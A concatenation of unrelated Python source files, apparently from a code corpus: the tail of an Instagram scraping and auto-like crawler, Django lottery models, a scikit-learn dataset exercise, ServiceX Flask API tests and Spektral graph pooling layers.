p = re.compile(r"window._sharedData = (?P<json>.*?);</script>", re.DOTALL)
json_data = re.search(p, source).group("json")
data = json.loads(json_data)
user_data = data["entry_data"]["ProfilePage"][0]["graphql"]["user"]
return {
"name": user_data["full_name"],
"desc": user_data["biography"],
"photo_url": user_data["profile_pic_url_hd"],
"post_num": user_data["edge_owner_to_timeline_media"]["count"],
"follower_num": user_data["edge_followed_by"]["count"],
"following_num": user_data["edge_follow"]["count"],
"website": user_data["external_url"],
}
def get_user_posts(self, username, number=None, detail=False):
user_profile = self.get_user_profile(username)
if not number:
number = instagram_int(user_profile["post_num"])
self._dismiss_login_prompt()
if detail:
return self._get_posts_full(number)
else:
return self._get_posts(number)
def get_latest_posts_by_tag(self, tag, num):
url = "%s/explore/tags/%s/" % (InsCrawler.URL, tag)
self.browser.get(url)
return self._get_posts(num)
def auto_like(self, tag="", maximum=1000):
self.login()
browser = self.browser
if tag:
url = "%s/explore/tags/%s/" % (InsCrawler.URL, tag)
else:
url = "%s/explore/" % (InsCrawler.URL)
self.browser.get(url)
ele_post = browser.find_one(".v1Nh3 a")
self.browser.js_click(ele_post)
for _ in range(maximum):
heart = browser.find_one(".dCJp8 .glyphsSpriteHeart__outline__24__grey_9")
if heart:
self.browser.js_click(heart)
randmized_sleep(2)
left_arrow = browser.find_one(".HBoOv")
if left_arrow:
self.browser.js_click(left_arrow)
randmized_sleep(2)
else:
break
def _get_posts_full(self, num):
@retry()
def check_next_post(cur_key):
ele_a_datetime = browser.find_one(".eo2As .c-Yi7")
# It takes time to load the post for some users with slow network
if ele_a_datetime is None:
raise RetryException()
next_key = ele_a_datetime.get_attribute("href")
if cur_key == next_key:
raise RetryException()
browser = self.browser
browser.implicitly_wait(1)
browser.scroll_down()
ele_post = browser.find_one(".v1Nh3 a")
self.browser.js_click(ele_post)
dict_posts = {}
pbar = tqdm(total=num)
pbar.set_description("fetching")
cur_key = None
all_posts = self._get_posts(num)
i = 1
# Fetching all posts
for _ in range(num):
dict_post = {}
# Fetching post detail
try:
if i < num:
check_next_post(all_posts[i]['key'])
i = i + 1
# Fetching datetime and url as key
ele_a_datetime = browser.find_one(".eo2As .c-Yi7")
cur_key = ele_a_datetime.get_attribute("href")
dict_post["key"] = cur_key
fetch_datetime(browser, dict_post)
fetch_imgs(browser, dict_post)
fetch_likes_plays(browser, dict_post)
fetch_likers(browser, dict_post)
fetch_caption(browser, dict_post)
fetch_comments(browser, dict_post)
except RetryException:
sys.stderr.write(
"\x1b[1;31m"
+ "Failed to fetch the post: "
+ cur_key or 'URL not fetched'
+ "\x1b[0m"
+ "\n"
)
break
except Exception:
sys.stderr.write(
"\x1b[1;31m"
+ "Failed to fetch the post: "
+ cur_key if isinstance(cur_key, str) else 'URL not fetched'
+ "\x1b[0m"
+ "\n"
)
traceback.print_exc()
self.log(json.dumps(dict_post, ensure_ascii=False))
dict_posts[browser.current_url] = dict_post
pbar.update(1)
pbar.close()
posts = list(dict_posts.values())
# if posts:
# posts.sort(key=lambda post: post["datetime"], reverse=True)
return posts
def _get_posts(self, num):
"""
To get posts, we have to click on the load more
button and make the browser call post api.
"""
TIMEOUT = 600
browser = self.browser
key_set = set()
posts = []
pre_post_num = 0
wait_time = 1
pbar = tqdm(total=num)
def start_fetching(pre_post_num, wait_time):
ele_posts = browser.find(".v1Nh3 a")
for ele in ele_posts:
key = ele.get_attribute("href")
if key not in key_set:
dict_post = {"key": key}
ele_img = browser.find_one(".KL4Bh img", ele)
dict_post["caption"] = ele_img.get_attribute("alt")
dict_post["img_url"] = ele_img.get_attribute("src")
fetch_details(browser, dict_post)
key_set.add(key)
posts.append(dict_post)
if len(posts) == num:
break
if pre_post_num == len(posts):
pbar.set_description("Wait for %s sec" % (wait_time))
sleep(wait_time)
pbar.set_description("fetching")
wait_time *= 2
browser.scroll_up(300)
else:
wait_time = 1
pre_post_num = len(posts)
browser.scroll_down()
return pre_post_num, wait_time
pbar.set_description("fetching")
while len(posts) < num and wait_time < TIMEOUT:
post_num, wait_time = start_fetching(pre_post_num, wait_time)
pbar.update(post_num - pre_post_num)
pre_post_num = post_num
loading = browser.find_one(".W1Bne")
if not loading and wait_time > TIMEOUT / 2:
break
pbar.close()
print("Done. Fetched %s posts." % (min(len(posts), num)))
return posts[:num]
|
py | b4159688350829969656843d4018ec7ec62a9efb | ##############################################################################################################
#
# by Claire Harrison ([email protected])
#
# Works with django 1.9.1 and python 2.7.11 or django 1.9.2 and python 3.5.1 (and probably others)
#
##############################################################################################################
from __future__ import unicode_literals
from six import with_metaclass
import decimal
from django.utils.encoding import python_2_unicode_compatible
from django.db.models.base import ModelBase
from django.db import models, IntegrityError
from django.core import exceptions
from django.contrib.auth.hashers import make_password
@python_2_unicode_compatible
class LotteryNumberSet(list):
'''Custom data type to hold a set of lottery numbers'''
def __str__(self):
return ','.join(str(i) for i in self) # convert numbers to a string
def __init__(self, list=[]):
return super(LotteryNumberSet, self).__init__(list)
class LotteryNumberField(models.CommaSeparatedIntegerField):
'''Field to hold a LotteryNumberSet and validate it according to the rules which apply to the type of lottery to which it relates'''
def __init__(self, *args, **kw):
kw['max_length'] = 30
super(LotteryNumberField, self).__init__(*args, **kw)
def deconstruct(self):
name, path, args, kwargs = super(LotteryNumberField, self).deconstruct()
del kwargs["max_length"]
return name, path, args, kwargs
def from_db_value(self, value, expression, connection, context):
return self.to_python(value)
@staticmethod
def to_python(value):
if not value: return LotteryNumberSet([])
if isinstance(value, (list, tuple)): return LotteryNumberSet(value)
else: return LotteryNumberSet(filter(None, (int(i) if i else None for i in value.strip('][').split(','))))
def get_prep_value(self, value):
if not value:
if self.default == None: raise IntegrityError
else: return ''
else: return ','.join(str(i) for i in sorted(value)) # arrange numbers in ascending order
def validate(self, value, model_instance):
'''Validate the value according to the rules for the type of lottery this field is associated with'''
if not self.editable: return # Skip validation for non-editable fields.
if value is None and not self.null: raise exceptions.ValidationError(self.error_messages['null'], code='null')
if not self.blank and value in self.empty_values: raise exceptions.ValidationError(self.error_messages['blank'], code='blank')
v = LotteryNumberField.to_python(value)
if hasattr(model_instance, 'lotterytype'): model_instance.lotterytype.checkNumbers(v) # check numbers before saving
else: model_instance.draw.lotterytype.checkNumbers(v)
class LotteryTypeMeta(ModelBase):
'''Metaclass to collect the names of subclasses of LotteryType as they are created.
(They are used later in the method LotteryType.sub to find the actual class of LotteryType objects.)
As written it will only work with direct subclasses of LotteryType'''
def __new__(cls, name, parents, dct):
'''When creating a new class, if it is a subclass of LotteryType, lowercase its name and
store it in the LotteryType.subclasses class variable.'''
if name == 'LotteryType':
if not 'subclasses' in dct: dct['subclasses'] = set()
elif 'LotteryType' in [p.__name__ for p in parents]: parents[0].subclasses.add(name.lower())
return super(LotteryTypeMeta, cls).__new__(cls, name, parents, dct)
@python_2_unicode_compatible
class LotteryType(with_metaclass(LotteryTypeMeta, models.Model)):
'''Abstract superclass for different lottery types.
A series of lottery draws with the same rules, and the possibility of a rollover if no prize is allocated'''
name = models.CharField(max_length=30)
number_of_numbers = models.PositiveIntegerField()
max_val = models.PositiveIntegerField()
rollover = models.DecimalField(decimal_places=2, default=decimal.Decimal('0.00'), max_digits=20)
min_matches = models.PositiveIntegerField(default=1)
@property
def sub(self):
'''Return the current object downcast to an object of its actual type (which is a subclass of LotteryType)'''
for name in self.subclasses:
if hasattr(self, name): return getattr(self, name)
def __str__(self): return 'Lottery Type {}'.format(self.name)
def checkEntry(self, e):
'''Check that an entry is valid.
To be valid its numbers must be valid '''
return self.checkNumbers(e.entry)
def checkNumbers(self, n):
'''Check that a list of values is valid.
To be valid it must have the correct number of integers which must be in the range 1 to max_val (inclusive).
And the same number should not occur more than once.
A value Error is raised if these conditions are not met.'''
seen = []
if len(n) != self.number_of_numbers: raise ValueError("Incorrect number of numbers")
for x in n:
if x < 1 or x > self.max_val: raise ValueError("Number out of range")
if x in seen: raise ValueError("Duplicate Value")
seen.append(x)
return True
def checkMatches(self, draw, entry):
'''Find how many numbers in the given entry are also in the winning_combo'''
return len([n for n in entry.entry if n in draw.winning_combo])
def findWinners(self, draw):
return self.sub._findWinners(draw)
def allocatePrize(self, draw):
return self.sub._allocatePrize(draw)
# The following two static methods exist to be extended by subclasses
@staticmethod
def _findWinners(draw):
'''Find the winners of this draw, and how many matches they have.
Store the results in the object, and return them.
The rule is that the punter(s) with the largest number of matches win(s) -- as long as they have at least the minimum number of matches.
If more than one punter has the winning number of matches, they share the prize between them.'''
draw.maxMatches, draw.winners = 0, set()
for e in draw.entry_set.all():
matches = draw._checkMatches(e)
if matches > draw.maxMatches:
draw.maxMatches = matches
if matches >= draw.lotterytype.min_matches: # cant win with too few matches
draw.winners = {e}
elif matches < draw.lotterytype.min_matches: continue
elif matches == draw.maxMatches:
draw.winners.add(e)
return draw.maxMatches, draw.winners
@staticmethod
def _allocatePrize(draw):
'''Divide the prize money (including any rollover) among the winners, if there are any winners.
Otherwise add the prize money to the rollover.'''
if not draw.winners:
draw.lotterytype.rollover += draw.prize
return None
amount = (draw.prize + draw.lotterytype.rollover) / len(draw.winners)
draw.lotterytype.rollover = decimal.Decimal('0.00')
draw.lotterytype.save()
for w in draw.winners: Win(entry=w, prize=amount).save()
#class Meta:
# abstract = True # dont tell django this is an abstract class, or we wont be able to use it in foreign keys
class SimpleLottery(LotteryType):
'''A type of lottery which has a prize for the highest number of matching numbers'''
class Meta:
verbose_name = 'Simple Lottery Type'
verbose_name_plural = 'Simple Lottery Types'
class MoreComplexLottery(LotteryType):
'''A type of lottery which has a prize for the highest number of matching numbers.
And also a prize for any entry which acheives a minimum number of matches.'''
# additional field required to store details the extra prizes to be allocated
spotprize_nummatches = models.PositiveIntegerField()
spotprize_value = models.DecimalField(decimal_places=2, max_digits=20)
@staticmethod
def _findWinners(draw):
# the main prize
draw.maxMatches, draw.winners = super(MoreComplexLottery, draw.lotterytype.sub)._findWinners(draw)
# the additional prizes
draw.spotprize_winners = set()
if draw.lotterytype.sub.spotprize_nummatches < draw.maxMatches or not draw.winners:
for e in [e for e in draw.entry_set.all() if not draw.winners or e not in draw.winners]:
if draw._checkMatches(e) >= draw.lotterytype.sub.spotprize_nummatches:
draw.spotprize_winners.add(e)
return draw.maxMatches, draw.winners
@staticmethod
def _allocatePrize(draw):
# the main prize
super(MoreComplexLottery, draw.lotterytype.sub)._allocatePrize(draw)
# the additional prizes
for w in draw.spotprize_winners: Win(entry=w, prize=draw.lotterytype.sub.spotprize_value, wintype=Win.SPOTPRIZE).save()
class Meta:
verbose_name = 'More Complex Lottery Type'
verbose_name_plural = 'More Complex Lottery Types'
@python_2_unicode_compatible
class Draw(models.Model):
'''A single draw which has a specific draw date, and will eventually have a winning combination'''
lotterytype = models.ForeignKey(LotteryType)
drawdate = models.DateTimeField()
prize = models.DecimalField(decimal_places=2, max_digits=20)
#_winning_combo = LotteryNumberField(db_column='winning_combo', blank=True)
winning_combo = LotteryNumberField(blank=True) # use this field for in coding
def __str__(self): return '{}, with draw on date {}'.format(self.lotterytype, self.drawdate)
def _checkMatches(self, entry):
return self.lotterytype.checkMatches(self, entry)
def makeDraw(self, *numbers):
'''Store the winning numbers, find the winners and allocate the prize'''
if self.winning_combo: raise RuntimeError("Draw has already been made")
self.winning_combo = numbers
self.save()
self.lotterytype.findWinners(self)
self.lotterytype.allocatePrize(self)
def save(self, *args, **kwargs):
'''validate and save the model'''
self.full_clean()
super(Draw, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Punter(models.Model):
'''An individual or syndicate who enters one or more lotteries'''
name = models.CharField(max_length=100)
address = models.TextField(null=True)
email = models.EmailField(unique=True)
password = models.CharField(max_length=100)
def __str__(self): return self.name
def save(self,*a,**kw):
self.password = make_password(self.password)
super(Punter,self).save(*a,**kw)
@python_2_unicode_compatible
class Entry(models.Model):
'''An entry to a draw made by a punter'''
punter = models.ForeignKey(Punter)
draw = models.ForeignKey(Draw)
time = models.DateTimeField(auto_now_add=True, blank=True)
#_entry = LotteryNumberField(db_column='entry', default=None) # this field for db storage (default=None prevents blank field being automatically stored)
entry = LotteryNumberField(blank=None) # use this field in coding
@property
def won(self): return True if self.win else False
def __str__(self): return 'Entry by {} for draw {}'.format(self.punter, self.draw)
class Meta:
verbose_name_plural = "Entries"
unique_together = (('punter', 'draw')) # dont allow punter to enter draw more than once
def save(self, *args, **kwargs):
'''validate and save the model'''
self.full_clean()
super(Entry, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Win(models.Model):
'''The award of a prize for a lottery entry'''
entry = models.OneToOneField(Entry)
prize = models.DecimalField(decimal_places=2, max_digits=20)
MAIN = 'M'
SPOTPRIZE = 'S'
wintypes = ((MAIN, 'main'), (SPOTPRIZE, 'spotprize'))
wintype = models.CharField(max_length=1, choices=wintypes, blank=False, default=MAIN)
def __str__(self): return 'win of {} for {}'.format(self.prize, self.entry)
|
py | b41596ffac0e87b905904e85259c987e51b2d7de | from sklearn import datasets
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# TODO 2
digits = datasets.load_digits()
print(digits.target.shape)
print(digits.data.shape)
print(digits.images.shape)
plt.imshow(digits.images[0], cmap='gray_r')
plt.show()
elements = 5
fig, axs = plt.subplots(len(digits.target_names), elements)
for nr in range(len(digits.target_names)):
for i in range(elements):
axs[nr][i].imshow(digits.images[digits.target == nr][i], cmap='gray_r')
axs[nr][i].axis('off')
plt.show()
# TODO 3
X, y = digits.data, digits.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
# TODO 4
faces = datasets.fetch_olivetti_faces()
print(faces.target.shape)
print(faces.data.shape)
print(faces.images.shape)
plt.imshow(faces.images[0], cmap='gray')
plt.show()
X, y = faces.data, faces.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
|
py | b4159715f38d36f570013ac658fdbe2ee62310b2 | # Copyright (c) 2019, IRIS-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
from unittest.mock import call
from flask import current_app
from servicex import LookupResultProcessor
from servicex.models import TransformRequest
from tests.resource_test_base import ResourceTestBase
class TestSubmitTransformationRequest(ResourceTestBase):
@staticmethod
def _generate_transformation_request(**kwargs):
request = {
'did': 'rucio://123-45-678',
'columns': "e.e, e.p",
'result-destination': 'kafka',
'kafka': {'broker': 'ssl.hep.kafka:12332'},
'chunk-size': 500,
'workers': 10
}
request.update(kwargs)
return request
@staticmethod
def _generate_transformation_request_xAOD_root_file():
return {
'did': '123-45-678',
'selection': "test-string",
'image': 'ssl-hep/func_adl:latest',
'result-destination': 'object-store',
'result-format': 'root-file',
'workers': 10
}
def test_submit_transformation_request_bad(self, client):
resp = client.post('/servicex/transformation', json={'timestamp': '20190101'})
assert resp.status_code == 400
def test_submit_transformation_bad_result_dest(self, client):
request = self._generate_transformation_request()
request['result-destination'] = 'foo'
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_bad_wrong_dest_for_format(self, client):
request = self._generate_transformation_request()
request['result-format'] = 'root-file'
request['result-destination'] = 'minio'
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_bad_result_format(self, client):
request = self._generate_transformation_request()
request['result-format'] = 'foo'
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_bad_workflow(self, client):
request = self._generate_transformation_request(columns=None, selection=None)
r = client.post('/servicex/transformation', json=request)
assert r.status_code == 400
def test_submit_transformation_bad_did_scheme(self, client):
request = self._generate_transformation_request(did='foobar://my-did')
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
assert "DID scheme is not supported" in response.json["message"]
def test_submit_transformation_request_throws_exception(
self, mocker, mock_rabbit_adaptor
):
mock_rabbit_adaptor.setup_queue = mocker.Mock(side_effect=Exception('Test'))
client = self._test_client(rabbit_adaptor=mock_rabbit_adaptor)
response = client.post('/servicex/transformation',
json=self._generate_transformation_request())
assert response.status_code == 503
assert response.json == {"message": "Error setting up transformer queues"}
def test_submit_transformation(self, mock_rabbit_adaptor, mock_app_version):
client = self._test_client(rabbit_adaptor=mock_rabbit_adaptor)
request = self._generate_transformation_request()
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.did == 'rucio://123-45-678'
assert saved_obj.finish_time is None
assert saved_obj.request_id == request_id
assert saved_obj.title is None
assert saved_obj.columns == "e.e, e.p"
assert saved_obj.image == current_app.config["TRANSFORMER_DEFAULT_IMAGE"]
assert saved_obj.chunk_size == 500
assert saved_obj.workers == 10
assert saved_obj.result_destination == 'kafka'
assert saved_obj.kafka_broker == "ssl.hep.kafka:12332"
assert saved_obj.app_version == "3.14.15"
assert saved_obj.code_gen_image == 'sslhep/servicex_code_gen_func_adl_xaod:develop'
setup_queue_calls = [call(request_id), call(request_id+"_errors")]
mock_rabbit_adaptor.setup_queue.assert_has_calls(setup_queue_calls)
mock_rabbit_adaptor.setup_exchange.assert_has_calls([
call('transformation_requests'),
call('transformation_failures')
])
bind_to_exchange_calls = [
call(exchange="transformation_requests", queue=request_id),
call(exchange="transformation_failures", queue=request_id+"_errors"),
]
assert mock_rabbit_adaptor.bind_queue_to_exchange.call_args_list == bind_to_exchange_calls
service_endpoint = \
"http://cern.analysis.ch:5000/servicex/internal/transformation/" + \
request_id
publish_body = {
"request_id": request_id,
"did": "123-45-678",
"service-endpoint": service_endpoint
}
mock_rabbit_adaptor.basic_publish.assert_called_with(
exchange='',
routing_key='rucio_did_requests',
body=json.dumps(publish_body)
)
def test_submit_transformation_default_scheme(self, mock_rabbit_adaptor, mock_app_version):
client = self._test_client(rabbit_adaptor=mock_rabbit_adaptor)
request = self._generate_transformation_request()
request['did'] = '123-45-678' # No scheme
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.did == 'rucio://123-45-678'
service_endpoint = \
"http://cern.analysis.ch:5000/servicex/internal/transformation/" + \
request_id
publish_body = {
"request_id": request_id,
"did": "123-45-678",
"service-endpoint": service_endpoint
}
mock_rabbit_adaptor.basic_publish.assert_called_with(
exchange='',
routing_key='rucio_did_requests',
body=json.dumps(publish_body)
)
def test_submit_transformation_with_root_file(
self, mocker, mock_rabbit_adaptor, mock_code_gen_service, mock_app_version
):
mock_code_gen_service.generate_code_for_selection.return_value = 'my-cm'
request = self._generate_transformation_request_xAOD_root_file()
client = self._test_client(
rabbit_adaptor=mock_rabbit_adaptor, code_gen_service=mock_code_gen_service
)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.did == 'rucio://123-45-678'
assert saved_obj.request_id == request_id
assert saved_obj.columns is None
assert saved_obj.selection == 'test-string'
assert saved_obj.image == 'ssl-hep/func_adl:latest'
assert saved_obj.chunk_size is None
assert saved_obj.workers == 10
assert saved_obj.result_destination == 'object-store'
assert saved_obj.result_format == 'root-file'
assert saved_obj.generated_code_cm == 'my-cm'
assert saved_obj.app_version == "3.14.15"
assert saved_obj.code_gen_image == 'sslhep/servicex_code_gen_func_adl_xaod:develop'
setup_queue_calls = [call(request_id), call(request_id+"_errors")]
mock_rabbit_adaptor.setup_queue.assert_has_calls(setup_queue_calls)
bind_to_exchange_calls = [
call(exchange="transformation_requests", queue=request_id),
call(exchange="transformation_failures", queue=request_id+"_errors"),
]
assert mock_rabbit_adaptor.bind_queue_to_exchange.call_args_list == bind_to_exchange_calls
service_endpoint = \
"http://cern.analysis.ch:5000/servicex/internal/transformation/" + \
request_id
mock_rabbit_adaptor. \
basic_publish.assert_called_with(exchange='',
routing_key='rucio_did_requests',
body=json.dumps(
{
"request_id": request_id,
"did": "123-45-678",
"service-endpoint": service_endpoint}
))
def test_submit_transformation_file_list(self, mocker):
request = self._generate_transformation_request()
request['did'] = None
request['file-list'] = ["file1", "file2"]
mock_processor = mocker.MagicMock(LookupResultProcessor)
client = self._test_client(lookup_result_processor=mock_processor)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
mock_processor.publish_preflight_request.assert_called_once()
preflight_call = mock_processor.publish_preflight_request.call_args
assert preflight_call[0][1] == 'file1'
mock_processor.add_file_to_dataset.assert_called()
add_file_calls = mock_processor.add_file_to_dataset.call_args_list
assert mock_processor.add_file_to_dataset.call_count == 2
assert add_file_calls[0][0][1].file_path == 'file1'
assert add_file_calls[1][0][1].file_path == 'file2'
mock_processor.report_fileset_complete.assert_called()
fileset_complete_call = mock_processor.report_fileset_complete.call_args
assert fileset_complete_call[1]['num_files'] == 2
def test_submit_transformation_request_bad_image(
self, mocker, mock_docker_repo_adapter
):
mock_docker_repo_adapter.check_image_exists = mocker.Mock(return_value=False)
client = self._test_client(docker_repo_adapter=mock_docker_repo_adapter)
request = self._generate_transformation_request()
request["image"] = "ssl-hep/foo:latest"
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
assert response.json == {"message": "Requested transformer docker image doesn't exist: " + request["image"]} # noqa: E501
def test_submit_transformation_request_no_docker_check(
self, mocker, mock_docker_repo_adapter
):
mock_docker_repo_adapter.check_image_exists = mocker.Mock(return_value=False)
client = self._test_client(
extra_config={'TRANSFORMER_VALIDATE_DOCKER_IMAGE': False},
docker_repo_adapter=mock_docker_repo_adapter,
)
request = self._generate_transformation_request()
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
mock_docker_repo_adapter.check_image_exists.assert_not_called()
def test_submit_transformation_with_root_file_selection_error(
self, mocker, mock_code_gen_service
):
mock_code_gen_service.generate_code_for_selection = \
mocker.Mock(side_effect=ValueError('This is the error message'))
request = self._generate_transformation_request_xAOD_root_file()
client = self._test_client(code_gen_service=mock_code_gen_service)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_missing_dataset_source(self, client):
request = self._generate_transformation_request()
request['did'] = None
request['file-list'] = []
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_duplicate_dataset_source(self, client):
request = self._generate_transformation_request()
request['did'] = "This did"
request['file-list'] = ["file1.root", "file2.root"]
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_with_object_store(self, mocker):
from servicex import ObjectStoreManager
local_config = {
'OBJECT_STORE_ENABLED': True,
'MINIO_URL': 'localhost:9000',
'MINIO_ACCESS_KEY': 'miniouser',
'MINIO_SECRET_KEY': 'leftfoot1'
}
mock_object_store = mocker.MagicMock(ObjectStoreManager)
client = self._test_client(
extra_config=local_config,
object_store=mock_object_store
)
request = self._generate_transformation_request(**{
"result-destination": "object-store",
"result-format": "parquet"
})
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
mock_object_store.create_bucket.assert_called_with(request_id)
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.result_destination == 'object-store'
assert saved_obj.result_format == 'parquet'
def test_submit_transformation_auth_enabled(
self, mock_jwt_extended, mock_requesting_user
):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
response = client.post('/servicex/transformation',
json=self._generate_transformation_request())
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.submitted_by == mock_requesting_user.id
def test_submit_transformation_with_title(self, client):
title = "Things Fall Apart"
request = self._generate_transformation_request(title=title)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.title == title
|
py | b415984ebbdc279e144710cca361813233a9a2a6 | import tensorflow as tf
from tensorflow.keras import backend as K, initializers, regularizers, constraints
from tensorflow.keras.layers import Layer, Dense
from spektral.layers import ops
class GlobalPool(Layer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.supports_masking = True
self.pooling_op = None
self.batch_pooling_op = None
def build(self, input_shape):
if isinstance(input_shape, list) and len(input_shape) == 2:
self.data_mode = 'disjoint'
else:
if len(input_shape) == 2:
self.data_mode = 'single'
else:
self.data_mode = 'batch'
super().build(input_shape)
def call(self, inputs):
if self.data_mode == 'disjoint':
X = inputs[0]
I = inputs[1]
if K.ndim(I) == 2:
I = I[:, 0]
else:
X = inputs
if self.data_mode == 'disjoint':
return self.pooling_op(X, I)
else:
return self.batch_pooling_op(X, axis=-2, keepdims=(self.data_mode == 'single'))
def compute_output_shape(self, input_shape):
if self.data_mode == 'single':
return (1,) + input_shape[-1:]
elif self.data_mode == 'batch':
return input_shape[:-2] + input_shape[-1:]
else:
# Input shape is a list of shapes for X and I
return input_shape[0]
def get_config(self):
return super().get_config()
class GlobalSumPool(GlobalPool):
"""
A global sum pooling layer. Pools a graph by computing the sum of its node
features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
None.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pooling_op = tf.math.segment_sum
self.batch_pooling_op = tf.reduce_sum
class GlobalAvgPool(GlobalPool):
"""
An average pooling layer. Pools a graph by computing the average of its node
features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
None.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pooling_op = tf.math.segment_mean
self.batch_pooling_op = tf.reduce_mean
class GlobalMaxPool(GlobalPool):
"""
A max pooling layer. Pools a graph by computing the maximum of its node
features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
None.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pooling_op = tf.math.segment_max
self.batch_pooling_op = tf.reduce_max
class GlobalAttentionPool(GlobalPool):
r"""
A gated attention global pooling layer from the paper
> [Gated Graph Sequence Neural Networks](https://arxiv.org/abs/1511.05493)<br>
> Yujia Li et al.
This layer computes:
$$
\X' = \sum\limits_{i=1}^{N} (\sigma(\X \W_1 + \b_1) \odot (\X \W_2 + \b_2))_i
$$
where \(\sigma\) is the sigmoid activation function.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, channels)` (if single mode,
shape will be `(1, channels)`).
**Arguments**
- `channels`: integer, number of output channels;
- `bias_initializer`: initializer for the bias vectors;
- `kernel_regularizer`: regularization applied to the kernel matrices;
- `bias_regularizer`: regularization applied to the bias vectors;
- `kernel_constraint`: constraint applied to the kernel matrices;
- `bias_constraint`: constraint applied to the bias vectors.
"""
def __init__(self,
channels,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super().__init__(**kwargs)
self.channels = channels
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
def build(self, input_shape):
super().build(input_shape)
layer_kwargs = dict(
kernel_initializer=self.kernel_initializer,
bias_initializer=self.bias_initializer,
kernel_regularizer=self.kernel_regularizer,
bias_regularizer=self.bias_regularizer,
kernel_constraint=self.kernel_constraint,
bias_constraint=self.bias_constraint
)
